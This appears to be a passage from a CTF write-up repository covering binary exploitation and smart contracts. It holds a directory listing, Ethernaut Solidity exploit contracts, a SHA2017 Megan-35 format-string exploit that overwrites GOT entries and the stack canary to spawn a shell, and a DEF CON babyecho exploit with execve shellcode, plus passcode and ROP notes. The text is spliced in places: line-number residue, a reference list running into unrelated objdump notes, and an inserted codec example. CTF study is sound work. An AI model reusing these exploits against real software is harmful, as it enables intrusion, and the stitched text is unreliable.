├── Ethernaut
│   ├── lv3.sol
│   ├── lv4.sol
│   └── readme.md
├── Format String
│   ├── SHA2017 Megan-35
│   │   ├── 1.png
│   │   ├── 2.png
│   │   ├── 3.png
│   │   ├── megan.png
│   │   ├── readme.md
│   │   └── solve.py
│   ├── babyecho_defcon_2015
│   │   ├── exploit.py
│   │   └── readme.md
│   └── readme.md
├── GDB.md
├── Pwnable.kr
│   ├── Passcode
│   │   ├── passcode
│   │   ├── passcode.c
│   │   └── readme.md
│   ├── cmd1.md
│   ├── cmd2.md
│   ├── random.md
│   └── readme.md
├── README.md
├── ROP
│   ├── 0ctf_blackhole
│   │   ├── blackhole.tar.gz
│   │   ├── readme.md
│   │   └── solve.py
│   ├── Bamboofox 2017 infant-go
│   │   ├── infant-gogogo.py
│   │   ├── infant-gogogo.zip
│   │   ├── infant-gotoheaven.py
│   │   ├── infant-gotoheaven.zip
│   │   └── readme.md
│   ├── Bugsbunnyctf Pwn100
│   │   ├── pwn100
│   │   ├── readme.md
│   │   └── solve.py
│   ├── CSAW 2017 pwn 100 scv
│   │   ├── libc-2.23.so
│   │   ├── readme.md
│   │   ├── scv
│   │   └── solve.py
│   ├── CSAW 2017 pwn 75 pilot
│   │   ├── pilot
│   │   ├── readme.md
│   │   └── solve.py
│   ├── Codegate_CTF_2018_Preliminary
│   │   └── BaskinRobins31
│   │       ├── 4b9a5f57118bcfb6db1d0991af9e4159
│   │       ├── libc.so.6
│   │       └── solve.py
│   ├── Defcon_crashme
│   │   ├── readme.md
│   │   ├── smashme
│   │   ├── smashme.py
│   │   └── smasm.txt
│   ├── Defcon_r0pbaby
│   │   └── readme.md
│   ├── Insomni-hack teaser 2018 onecall
│   │   ├── brute_force.py
│   │   ├── onecall-efe64fb18c06fbc4ce1c2ae4e7679e14c19ac293d04bdbd13b7d6babe49728b8.tgz
│   │   ├── readme.md
│   │   └── solve.py
│   ├── PicoCTF_2013_ROP_1_4
│   │   ├── rop1-fa6168f4d8eba0eb
│   │   ├── rop1
│   │   │   ├── readme.md
│   │   │   └── rop1.py
│   │   ├── rop2-20f65dd0bcbe267d
│   │   ├── rop2
│   │   │   ├── readme.md
│   │   │   └── rop2.py
│   │   ├── rop3-7f3312fe43c46d26
│   │   ├── rop3
│   │   │   ├── readme.md
│   │   │   └── rop3.py
│   │   └── rop4
│   ├── VXCTF 2nd EasyPWN
│   │   ├── bof
│   │   ├── readme.md
│   │   └── solve.py
│   ├── VXCTF 2nd EasyPWN2
│   │   ├── bof2
│   │   ├── libc.so.6
│   │   ├── readme.md
│   │   └── solve.py
│   └── readme.md
├── Reverse
│   ├── ASIS_2018_babyc
│   │   ├── babyc
│   │   ├── babyc_1a00d836423d314578effc629e58fe3801851df8d9653d5da6a52d4da30ab993
│   │   ├── cfg.png
│   │   ├── patched_bin
│   │   └── solve.py
│   ├── Bamboofox 2017 little-asm
│   │   ├── little-asm-221bc5c8651806d8a039d5ff2a68bc5c7d9e3a20
│   │   ├── little-asm-impossible-9d4350fd9310c7bd83a1829825b0fd6491605f4c
│   │   ├── little-asm-revenge
│   │   ├── little-asm-revenge.py
│   │   ├── little-asm.py
│   │   ├── little_asm_impossible.py
│   │   └── readme.md
│   ├── CSAW 2017 rev 100 tablez
│   │   ├── readme.md
│   │   ├── solve.py
│   │   └── tablez
│   ├── TUCTF_2017_Unknown
│   │   ├── readme.md
│   │   └── solve.py
│   └── UIUCTF_2018_Triptych
│       ├── readme.md
│       ├── solve.py
│       └── triptych
├── Tools
│   ├── SHA2017 asby -PE fuzzing
│   │   ├── asby.exe
│   │   ├── asby.py
│   │   └── readme.md
│   ├── heap.py
│   └── readme.md
├── angr
│   ├── BugsBunnyCTF 2017 rev150
│   │   ├── readme.md
│   │   ├── rev150
│   │   └── solve.py
│   ├── Codegate_CTF_2018_Preliminary
│   │   └── RedVelvet
│   │       ├── afbea1c0a463d63cd6f00389a3b2fe88
│   │       ├── byangr.py
│   │       ├── readme.md
│   │       └── solve.py
│   ├── Google CTF 2016 google2016_unbreakable_0
│   │   ├── 1.png
│   │   ├── 2.png
│   │   ├── readme.md
│   │   ├── solve_google_ctf_2016_0.py
│   │   └── unbreakable-enterprise-product-activation
│   ├── MeePwn CTF- Missing Hash
│   │   ├── 1.png
│   │   ├── 2.png
│   │   ├── 3.png
│   │   ├── 4.png
│   │   ├── 5.png
│   │   ├── 6.png
│   │   ├── crackme2_fix4.exe
│   │   ├── readme.md
│   │   └── solve.py
│   ├── VXCTF 2nd Simple REVERSE
│   │   ├── readme.md
│   │   ├── rev
│   │   └── solve.py
│   ├── cmu_bomb_lab_ref
│   │   ├── bomb
│   │   ├── bomb.py
│   │   ├── bomb2.py
│   │   ├── bomb_layer5.py
│   │   ├── bomb_layer_4.py
│   │   └── readme.md
│   └── readme.md
├── angr_type
│   └── Defcon_crackme1
│       ├── crackme1
│       └── readme.md
├── browser
│   ├── 34C3_V9
│   │   ├── pwn.js
│   │   └── readme.md
│   ├── Blaze_CTF_2018_blazefox
│   │   ├── 1.png
│   │   ├── 2.png
│   │   ├── 2_labelled.png
│   │   ├── 3.png
│   │   ├── 4.png
│   │   ├── 5.png
│   │   ├── 6.png
│   │   ├── README.txt
│   │   ├── blaze.patch
│   │   ├── pwn.js
│   │   └── readme.md
│   ├── CONFidence_CTF_2020_Teaser_Chromatic_aberration
│   │   ├── 1.jpg
│   │   ├── 2.jpg
│   │   ├── 3.jpg
│   │   ├── 6d87044f837a59e649f6d799143aede299a3103e764f8c46c921c3ee16da773a_chromatic_aberration.7z
│   │   ├── pwn_no_comment.js
│   │   ├── pwn_with_logs.js
│   │   ├── readme.md
│   │   └── solved.js
│   ├── CVE-2018-8372
│   │   └── pwn.js
│   ├── Codegate_CTF_2017_Preliminary_jsworld
│   │   ├── fuzzer
│   │   │   ├── a.js
│   │   │   ├── b.js
│   │   │   └── solve.py
│   │   ├── jsworld.zip
│   │   ├── pwn.js
│   │   └── readme.md
│   ├── Codegate_CTF_2019_Preliminary_Butterfree
│   │   ├── 7a45459c17c76c24ae18fe4870532939.zip
│   │   ├── 90b70bfa992696d63140ca63fcb035cf.zip
│   │   ├── ArrayPrototype_org.cpp
│   │   ├── flag.png
│   │   ├── readme.md
│   │   ├── reverse_shell.js
│   │   ├── solve.py
│   │   └── solved_large.js
│   ├── PlaidCTF_2018_Roll-a-d8
│   │   ├── 1.png
│   │   ├── 2.png
│   │   ├── 3.png
│   │   ├── 4.png
│   │   ├── 5.png
│   │   ├── 6.png
│   │   ├── 7.png
│   │   ├── 8.png
│   │   ├── d8_d97a796c6c189bbb350942ea5d92f4dd.tar.xz
│   │   ├── pwn.js
│   │   └── readme.md
│   └── RealWorldCTF_2019_Accessible
│       ├── accessible.zip.001
│       ├── accessible.zip.002
│       ├── accessible.zip.003
│       └── pwn.js
├── fuzzer.py
├── heap
│   ├── 0CTF_2017_babyheap
│   │   ├── 1.png
│   │   ├── 2.png
│   │   ├── babyheap_69a42acd160ab67a68047ca3f9c390b9
│   │   ├── libc-2.23.so
│   │   ├── libc.so.6_b86ec517ee44b2d6c03096e0518c72a1
│   │   ├── readme.md
│   │   └── solve.py
│   ├── 0ctf_2018_babyheap
│   │   ├── babyheap.tar.gz
│   │   ├── readme.md
│   │   └── solve.py
│   ├── Bamboofox 2017 MagicBook
│   │   ├── MagicBook.zip
│   │   ├── readme.md
│   │   └── solve.py
│   ├── CSAW CTF 2017 auir
│   │   ├── auir
│   │   ├── libc-2.23.so
│   │   ├── readme.md
│   │   └── solve.py
│   ├── CSAW CTF 2017 zone
│   │   ├── libc-2.23.so
│   │   ├── readme.md
│   │   ├── solve.py
│   │   └── zone
│   ├── Codegate_CTF_2018_Preliminary
│   │   └── SuperMarimo
│   │       ├── 7ae39f9f3910ac6928dffc35a2b25548
│   │       ├── cg1.png
│   │       ├── cg2.png
│   │       ├── cg3.png
│   │       ├── libc.so.6
│   │       ├── readme.md
│   │       └── solve.py
│   ├── Jarvis0J
│   │   └── guestbook2
│   │       ├── readme.md
│   │       └── solve.py
│   ├── N1CTF_2018_vote
│   │   ├── b8a4590d-9fee-4a34-8396-d63adac62a0d.zip
│   │   ├── readme.md
│   │   └── solve.py
│   ├── POC2018_theori_speedrun
│   │   ├── solve.py
│   │   └── speedypwn_c743765c8f6d2fcfc0eabde9315f4a9b
│   ├── hacklu_2018_heapheaven2
│   │   ├── heap_heaven_2_4ea0c03fca366bef52322a964fc62325.zip
│   │   └── solve.py
│   ├── hitcon2016_house_of_orange
│   │   ├── houseoforange_22785bece84189e632567da38e4be0e0c4bb1682
│   │   ├── libc.so.6_375198810bb39e6593a968fcbcf6556789026743
│   │   └── solve.py
│   ├── hitcon2018_children_tcache
│   │   ├── children_tcache-d737eac1ffe293ffe697bffc692a1280.tar.gz
│   │   └── solve.py
│   ├── note
│   │   └── New-Exploit-Methods-against-Ptmalloc-of-GLIBC
│   │       ├── consol_poc1.c
│   │       ├── consol_poc2.c
│   │       ├── enlarge_infoleak_poc.c
│   │       ├── enlarge_poc.c
│   │       ├── image
│   │       │   ├── 04_01.png
│   │       │   ├── 04_02.png
│   │       │   ├── 04_03.png
│   │       │   ├── 04_04.png
│   │       │   ├── 04_05.png
│   │       │   └── readme.md
│   │       ├── readme.md
│   │       └── shrink_poc.c
│   └── reference
│       ├── 20170604ssmjp-170604135916.pdf
│       ├── Glibc_Adventures-The_Forgotten_Chunks.pdf
│       ├── bh-usa-07-ferguson-WP.pdf
│       ├── glibcmalloc-110710054847-phpapp01.ppt
│       ├── glibc内存管理ptmalloc源代码分析.pdf
│       ├── malloc-150821074656-lva1-app6891.pdf
│       ├── ptmalloc_camera.pdf
│       └── readme.md
├── hidden_writing.py
├── kernel
│   └── hacklu_2018_babykernel
│       ├── baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.7z
│       └── readme.md
├── misc
│   ├── SHA2017 CTF Rev100 Suspect File 1
│   │   ├── 1.png
│   │   ├── 2.png
│   │   ├── 3.png
│   │   ├── 4.png
│   │   ├── ida.png
│   │   ├── nanase.png
│   │   ├── readme.md
│   │   └── suspectfile1.tgz
│   ├── VXCTF 2nd Flag Checking Oracle 2
│   │   ├── fco_v2.0.py
│   │   ├── readme.md
│   │   └── solve.py
│   └── polictf2017 Status box-120
│       ├── readme.md
│       └── statusbox.py
├── pattc_list.txt
└── web
    └── UIUCTF
        └── Bot_Protection_IV
            ├── 0.jpg
            ├── 1.jpg
            ├── 10.jpg
            ├── 11.jpg
            ├── 12.jpg
            ├── 13.jpg
            ├── 14.jpg
            ├── 15.jpg
            ├── 2.jpg
            ├── 3.jpg
            ├── 4.jpg
            ├── 5.jpg
            ├── 6.jpg
            ├── 7.jpg
            ├── 8.jpg
            ├── 9.jpg
            ├── FDSEJ.png
            ├── JGGSS.png
            ├── JPSCB.png
            ├── PTJYZ.png
            ├── UZNXF_54629.png
            ├── VJGJJ.png
            ├── YJKYY.png
            ├── chall.jpg
            ├── charset.jpg
            ├── comment.jpg
            ├── ensemble_learning.jpg
            ├── failure.jpg
            ├── lv169.jpg
            ├── lv225.jpg
            ├── mainpage.jpg
            ├── model1.jpg
            ├── readme.md
            ├── solve.py
            ├── solved.jpg
            └── unzip.jpg

--------------------------------------------------------------------------------
/Ethernaut/lv3.sol:
--------------------------------------------------------------------------------
pragma solidity ^0.4.18;

contract CoinFlip {
  uint256 public consecutiveWins;
  uint256 lastHash;
  uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

  function CoinFlip() public {
    consecutiveWins = 0;
  }

  function flip(bool _guess) public returns (bool) {
    // The "random" side is derived from the previous block hash, which any
    // other contract in the same block can compute as well.
    uint256 blockValue = uint256(block.blockhash(block.number-1));

    if (lastHash == blockValue) {
      revert();
    }

    lastHash = blockValue;
    uint256 coinFlip = blockValue / FACTOR;
    bool side = coinFlip == 1 ? true : false;

    if (side == _guess) {
      consecutiveWins++;
      return true;
    } else {
      consecutiveWins = 0;
      return false;
    }
  }
}

contract exploit{
  uint256 lastHash;
  uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
  CoinFlip contact;

  function exploit() public {
    // contract_address: placeholder for the address of the deployed CoinFlip instance
    contact = CoinFlip(contract_address);
  }

  function flip1() public returns (bool){
    // Recompute the same side CoinFlip will compute in this block, then submit it.
    uint256 blockValue = uint256(block.blockhash(block.number-1));

    if (lastHash == blockValue) {
      revert();
    }
    lastHash = blockValue;
    uint256 coinFlip = blockValue / FACTOR;
    bool side = coinFlip == 1 ? true : false;
    contact.flip(side);
    return true;
  }

}

--------------------------------------------------------------------------------
/Ethernaut/lv4.sol:
--------------------------------------------------------------------------------
pragma solidity ^0.4.18;

contract Telephone {

  address public owner;

  function Telephone() public {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    // tx.origin is the externally owned account that started the transaction;
    // msg.sender is the immediate caller. They differ whenever a contract calls in.
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}



contract exploit{
  Telephone contact;
  function exploit() public {
    // contract_sol: placeholder for the address of the deployed Telephone instance
    contact = Telephone(contract_sol);
  }


  function get_owner() public {
    // your_eth_address: placeholder for the address that should become owner
    contact.changeOwner(your_eth_address);
  }

}

--------------------------------------------------------------------------------
/Ethernaut/readme.md:
--------------------------------------------------------------------------------
# Level 6

mydata="dd365b8b"

contract.sendTransaction({data:mydata})

--------------------------------------------------------------------------------
/Format String/SHA2017 Megan-35/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Format String/SHA2017 Megan-35/1.png
--------------------------------------------------------------------------------
/Format String/SHA2017 Megan-35/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Format String/SHA2017 Megan-35/2.png
--------------------------------------------------------------------------------
/Format String/SHA2017 Megan-35/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Format String/SHA2017 Megan-35/3.png
--------------------------------------------------------------------------------
/Format String/SHA2017 Megan-35/megan.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Format String/SHA2017 Megan-35/megan.png
--------------------------------------------------------------------------------
/Format String/SHA2017 Megan-35/readme.md:
--------------------------------------------------------------------------------
# SHA2017 Megan-35

This one is not actually hard. If you had been comfortable with the canary during the competition, it would have been a pure coding challenge plus some primary-school addition and subtraction :0)

The challenge is a service that takes a Megan-35 encrypted message as input and outputs the decrypted message.

It has a format string bug.


Since the canary is enabled, we can corrupt the canary and overwrite __stack_chk_fail and printf, jump back to main, input /bin/sh and run system("/bin/sh").


First, find the canary address with IDA:


![alt text](1.png)



From the stack dump, position 135 holds the saved canary, and from position 71 onward sits the decrypted message that is passed to printf.



![alt text](2.png)



Since libc is provided and there is no ASLR, we can place the printf GOT entry at position 71, read it, work out the libc offset and recover the server-side address of system:


![alt text](3.png)

However, reading %71$p directly only returns the printf GOT address itself, so we send 70 %p specifiers and then dereference position 71 with %s.

```python
#dereference by %s

payload+='%p'*70+'--'+'%s'

printf_addr=int(r.recv(1024).split('--')[-1][:4][::-1].encode('hex'),16)

```

After that, overwrite __stack_chk_fail with main and printf with system.



The last step is writing the canary.

![alt text](2.png)


In the stack dump, position 139 obviously holds something that looks like a stack address.


So, locally, subtract the canary address ($ebp-0x1c) from the address saved at position 139,

which gives 0x34.


Send %139$p to get the address stored at position 139 on the server side,


canary: 0xffffdd9c = 0xffffddd0 - 0x34



Format String payload

```python
#Step 1 write stack chk fail to main
payload =p32(stack_check_fail_got)
payload+=p32(stack_check_fail_got+1)
payload+=p32(stack_check_fail_got+2)
payload+=p32(stack_check_fail_got+3)

#Step 2 write printf to system
payload+=p32(printf_got)
payload+=p32(printf_got+1)
payload+=p32(printf_got+2)
payload+=p32(printf_got+3)

#test arg 139
#-0x34
#address of canary
#send %139$p
#return 0xffffddd0
#from gdb, we know the difference between canary and %139$p is 0x34,
#so 0xffffdd9c=0xffffddd0-0x34

payload+=p32(0xffffdd9c)

#36 is the length of the payload above

fmt= '%188c%71$hhn'# 0xe0-36=188 written to position 71
fmt+='%164c%72$hhn'# 0x84-0xe0=
fmt+='%128c%73$hhn'# 0x04-0x84=
fmt+='%4c%74$hhn'# 0x08-0x04

#system_server=0xf7e53940
fmt+='%56c%75$hhn'# 0x40-0x08=
fmt+='%249c%76$hhn'# 0x39-0x40=
fmt+='%172c%77$hhn'# 0xe5-0x39=
fmt+='%18c%78$hhn' # 0xf7-0xe5=

#9 write canary
fmt+='%11c%79$hhn'
```

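The "Megan-35 encryption" the service speaks is just base64 with its output alphabet permuted. The encoder/decoder below is an added example, not the write-up's own solve.py; it reuses the two alphabets from that script, and the function names and the rejection of out-of-alphabet input are this example's own choices.

```python
# Added example (not from the original write-up): Megan-35 codec in Python 3.
# Megan-35 = standard base64 whose 65 output symbols (pad included) are remapped
# position-wise through a fixed table; decoding is the inverse remap + base64.
import base64

# Alphabets as given in the write-up's solve.py: the standard base64 symbol order
# and the Megan-35 symbol that stands in for each of them.
CHAR_BASE64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
CHAR_MEGAN35 = "3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5"

# The table must be a bijection on 65 symbols, otherwise decoding is ambiguous.
assert len(CHAR_BASE64) == len(CHAR_MEGAN35) == 65
assert len(set(CHAR_MEGAN35)) == 65

ENCODE_MAP = str.maketrans(CHAR_BASE64, CHAR_MEGAN35)
DECODE_MAP = str.maketrans(CHAR_MEGAN35, CHAR_BASE64)
MEGAN35_SYMBOLS = frozenset(CHAR_MEGAN35)


def m35encode(data: bytes) -> str:
    """Base64-encode data, then substitute every symbol through the Megan-35 table."""
    return base64.b64encode(data).decode("ascii").translate(ENCODE_MAP)


def m35decode(text: str) -> bytes:
    """Undo the substitution and base64-decode.

    Symbols outside the Megan-35 alphabet are rejected explicitly rather than
    silently discarded (which is what b64decode does without validate=True).
    Bad length or padding is reported by b64decode as binascii.Error, a
    subclass of ValueError.
    """
    bad = set(text) - MEGAN35_SYMBOLS
    if bad:
        raise ValueError("not Megan-35 symbols: %r" % sorted(bad))
    return base64.b64decode(text.translate(DECODE_MAP), validate=True)


def is_megan35(text: str) -> bool:
    """True when text is well-formed Megan-35 (alphabet, length and padding all valid)."""
    try:
        m35decode(text)
    except ValueError:  # includes binascii.Error
        return False
    return True


if __name__ == "__main__":
    # Constructed sample input, the string the write-up sends after its payload.
    sample = b"/bin/sh"
    encoded = m35encode(sample)
    print(encoded)                      # QwO0lYDtk355
    print(m35decode(encoded))           # b'/bin/sh'
    print(is_megan35(encoded[:-1]))     # False: truncated, padding no longer valid
```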
110 | 由於hhn 係根據%之前string 嘅length,再寫strelen去個address 111 | 112 | 加上canary頭一個byte係 \x00,所以求其寫d非0嘅野上去已經可以corrupt佢 113 | 114 | 115 | # Flag: 116 | ![alt text](megan.png) 117 | 118 | ``` 119 | flag{43eb404b714b8d22e1168775eba1669c} 120 | ``` 121 | 122 | 慘 123 | 124 | 125 | Reference 126 | ========================== 127 | 1.http://veritas501.space/2017/04/28/%E8%AE%BAcanary%E7%9A%84%E5%87%A0%E7%A7%8D%E7%8E%A9%E6%B3%95/ 128 | 129 | 2.https://hgarrereyn.gitbooks.io/th3g3ntl3man-ctf-writeups/content/2017/SHA2017CTF/problems/pwnable/megan-35/ 130 | 131 | 3.https://b0tchsec.com/2017/sha2017/megan-35 132 | 133 | 4.https://chung96vn.blogspot.hk/2017/08/sha2017-write-up-pwn-200.html 134 | 135 | 5.https://github.com/L4ys/CTF/blob/master/sha_2017/pwn200/exp.py 136 | 137 | -------------------------------------------------------------------------------- /Format String/SHA2017 Megan-35/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | import base64 4 | import binascii 5 | 6 | 7 | #flag{43eb404b714b8d22e1168775eba1669c} 8 | 9 | char_megan35 = "3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5" 10 | char_base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" 11 | char_map = dict(zip(char_base64, char_megan35)) 12 | 13 | def m35encode(s): 14 | b = base64.b64encode(s) 15 | return ''.join([char_map[x] for x in b]) 16 | 17 | libc = ELF('libc.so.6') 18 | host = "megan35.stillhackinganyway.nl" 19 | port = 3535 20 | 21 | r = remote(host,port) 22 | #r=process('./babyecho') 23 | 24 | #----dump printf addr 25 | printf_got = 0x804A00C 26 | #r.recvuntil('encryption.\n') 27 | #payload = p32(printf_got) 28 | 29 | #dereference by %s 30 | #payload+='%p'*70+'--'+'%s' 31 | 32 | #r.sendline(m35encode(payload)) 33 | 34 | #convert the last 4byte to hex 35 | #printf_addr=int(r.recv(1024).split('--')[-1][:4][::-1].encode('hex'),16) 36 | 37 | #print 'printf addr: '+hex(printf_addr) 38 | 
printf_addr_=0xf7e62020 39 | #system = printf_addr_ - libc.symbols['printf'] + libc.symbols['system'] 40 | 41 | #print 'addr: '+hex(system) 42 | #----------------- 43 | 44 | #r.interactive() 45 | #log.info("system: " + hex(system)) 46 | #r.close() 47 | #system=printf-libc.symbols["printf"]+libc.symbols["system"] 48 | 49 | #saved in offset 71 50 | #canary is in 135 51 | 52 | main=0x080484E0 53 | printf_got = 0x804A00C 54 | stack_check_fail_got = 0x0804a018 55 | printf_addr_=0xf7e62020 56 | system_server=0xf7e53940 57 | 58 | 59 | #Step 1 write stack chk fail to main 60 | payload =p32(stack_check_fail_got) 61 | payload+=p32(stack_check_fail_got+1) 62 | payload+=p32(stack_check_fail_got+2) 63 | payload+=p32(stack_check_fail_got+3) 64 | #Step 2 write printf to system 65 | payload+=p32(printf_got) 66 | payload+=p32(printf_got+1) 67 | payload+=p32(printf_got+2) 68 | payload+=p32(printf_got+3) 69 | 70 | #test arg 139 71 | #0xffffddd0-0x34 72 | payload+=p32(0xffffdd9c) 73 | 74 | fmt= '%188c%71$hhn'# 0xe0-36= 75 | fmt+='%164c%72$hhn'# 0x84-0xe0= 76 | fmt+='%128c%73$hhn'# 0x04-0x84= 77 | fmt+='%4c%74$hhn'# 0x08-0x04 78 | 79 | #system_server=0xf7e53940 80 | 81 | fmt+='%56c%75$hhn'# 0x40-0x08= 82 | fmt+='%249c%76$hhn'# 0x39-0x40= 83 | fmt+='%172c%77$hhn'# 0xe5-0x39= 84 | fmt+='%18c%78$hhn' # 0xf7-0xe5= 85 | 86 | #9 write canary 87 | fmt+='%11c%79$hhn' 88 | 89 | payload_=payload+fmt 90 | 91 | r.recvuntil('encryption.\n') 92 | #test='%139$x' 93 | r.sendline(m35encode(payload_)) 94 | 95 | 96 | r.sendline(m35encode('/bin/sh')) 97 | 98 | 99 | 100 | 101 | r.interactive() 102 | 103 | 104 | #length of payload=16 105 | 106 | 107 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /Format String/babyecho_defcon_2015/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process('./babyecho') 4 | shellcode = 
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" 5 | 6 | r.recvuntil("\n") 7 | r.sendline('%5$p') 8 | # change the recevied word to hex 9 | no_7=int(r.recvline(keepends=False),16) 10 | esp=no_7-0x1c 11 | 12 | r.recvuntil("\n") 13 | #extend the buffer 14 | #esp+0x10 is the length of the buffer to 103 15 | r.sendline(p32(esp+0x10)+'%99x%7$n') 16 | 17 | r.recvuntil("\n") 18 | #extend the buffer 19 | #esp+0x10 is the length of the buffer to 103 20 | r.sendline(p32(esp+0x10)+'%999x%7$n') 21 | 22 | #reuse 23 | r.recvuntil("\n") 24 | payload = '' 25 | payload += p32(esp + 0x18) # $7 26 | payload += p32(esp + 0x42c) # $8 27 | payload += p32(esp + 0x42c + 1) # $9 28 | payload += p32(esp + 0x42c + 2) # $10 29 | payload += p32(esp + 0x42c + 3) # $11 30 | ptr = esp + 0x1c + len(payload) 31 | payload += shellcode 32 | initial_len = len(payload) 33 | payload += '%7$hhn' 34 | payload += ('%%%dd' % ((ord(p32(ptr)[0]) - initial_len) % 0x100 + 0x100)) + '%8$hhn' 35 | payload += ('%%%dd' % ((ord(p32(ptr)[1]) - ord(p32(ptr)[0])) % 0x100 + 0x100)) + '%9$hhn' 36 | payload += ('%%%dd' % ((ord(p32(ptr)[2]) - ord(p32(ptr)[1])) % 0x100 + 0x100)) + '%10$hhn' 37 | payload += ('%%%dd' % ((ord(p32(ptr)[3]) - ord(p32(ptr)[2])) % 0x100 + 0x100)) + '%11$hhn' 38 | r.sendline(payload) 39 | 40 | 41 | 42 | 43 | r.sendline('ls') 44 | r.interactive() 45 | -------------------------------------------------------------------------------- /Format String/babyecho_defcon_2015/readme.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | Reference: 20 | https://blog.skullsecurity.org/2015/defcon-quals-babyecho-format-string-vulns-in-gory-detail 21 | 22 | https://mzyy94.com/blog/2015/05/18/defcon-qual-23-writeup/ 23 | 24 | https://github.com/ctfs/write-ups-2015/tree/master/defcon-qualifier-ctf-2015/babys-first/babyecho 25 | 26 | 
https://github.com/VulnHub/ctf-writeups/blob/master/2015/defcon-quals/babyecho.md 27 | 28 | 29 | https://kimiyuki.net/blog/2016/01/08/defcon-qualifier-ctf-2015-babyecho/ <<<:" 8 | 9 | 08048360 : 10 | 11 | ... 12 | 13 | ... 14 | 15 | 080483a0 : 16 | 17 | 18 | #for offset 19 | 20 | $ objdump -R rop3-7f3312fe43c46d26 21 | 22 | 23 | DYNAMIC RELOCATION RECORDS 24 | 25 | OFFSET TYPE VALUE 26 | 27 | 08049ff0 R_386_GLOB_DAT __gmon_start__ 28 | 29 | 0804a000 R_386_JUMP_SLOT read 30 | 31 | 0804a004 R_386_JUMP_SLOT getegid 32 | 33 | 0804a008 R_386_JUMP_SLOT __gmon_start__ 34 | 35 | 0804a00c R_386_JUMP_SLOT __libc_start_main 36 | 37 | 0804a010 R_386_JUMP_SLOT write 38 | 39 | 0804a014 R_386_JUMP_SLOT setresgid 40 | 41 | 42 | radare2->i check canary 43 | 44 | check x/x $rbp and $rbp+4/+8 45 | -------------------------------------------------------------------------------- /Pwnable.kr/Passcode/passcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Pwnable.kr/Passcode/passcode -------------------------------------------------------------------------------- /Pwnable.kr/Passcode/passcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void login(){ 5 | int passcode1; 6 | int passcode2; 7 | 8 | printf("enter passcode1 : "); 9 | scanf("%d", passcode1); 10 | fflush(stdin); 11 | 12 | // ha! 
mommy told me that 32bit is vulnerable to bruteforcing :) 13 | printf("enter passcode2 : "); 14 | scanf("%d", passcode2); 15 | 16 | printf("checking...\n"); 17 | if(passcode1==338150 && passcode2==13371337){ 18 | printf("Login OK!\n"); 19 | system("/bin/cat flag"); 20 | } 21 | else{ 22 | printf("Login Failed!\n"); 23 | exit(0); 24 | } 25 | } 26 | 27 | void welcome(){ 28 | char name[100]; 29 | printf("enter you name : "); 30 | scanf("%100s", name); 31 | printf("Welcome %s!\n", name); 32 | } 33 | 34 | int main(){ 35 | printf("Toddler's Secure Login System 1.0 beta.\n"); 36 | 37 | welcome(); 38 | login(); 39 | 40 | // something after login... 41 | printf("Now I can safely trust you that you have credential :)\n"); 42 | return 0; 43 | } 44 | 45 | -------------------------------------------------------------------------------- /Pwnable.kr/Passcode/readme.md: -------------------------------------------------------------------------------- 1 | Set break point at welcome 2 | 3 | 搵 name[100] address->ebp-0x70 4 | 5 | set at login 6 | 7 | 搵passcode1 ,passcode2 address 8 | 9 | passcode1:ebp-0x10 10 | passcode2:ebp-0xc 11 | 12 | EBP: 0xffffd3a8 --> 0xffffd3c8 13 | 14 | observed that EBP(base pointer) address is the same for two cases 15 | 16 | 0x70-0x10=96 17 | 18 | 19 | objdump -R passcode <-check GOT table for passcode 20 | 21 | 22 | use IDA pro find system address:080485E3 23 | 24 | 因為入完passcode1之後只有function run(scanf,printf,chk....)做過 25 | 26 | 所以,先疊高name,向passcode1寫入地址令passcode1指向(scanf,printf,chk....) 27 | 再input system address 28 | 29 | scanf("%d", passcode1); 5 | >Can get the flag from a [black hole](blackhole.tar.gz)? 
